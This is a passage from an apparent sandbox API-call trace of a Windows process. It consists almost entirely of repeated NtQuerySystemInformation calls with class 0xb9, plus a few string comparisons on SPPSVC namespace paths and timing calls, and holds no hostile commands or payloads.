NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0283.487] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x28, ResultLength=0x0) [0283.500] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0283.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x28, ResultLength=0x0) [0283.501] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0283.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0283.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x28, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0283.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0283.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d030 | out: lpSystemTimeAsFileTime=0xa78207d030*(dwLowDateTime=0x365293e0, dwHighDateTime=0x1d6666a)) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0283.513] GetTickCount () returned 0x1186ef4 [0283.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x28, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0283.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.532] NtQuerySystemInformation 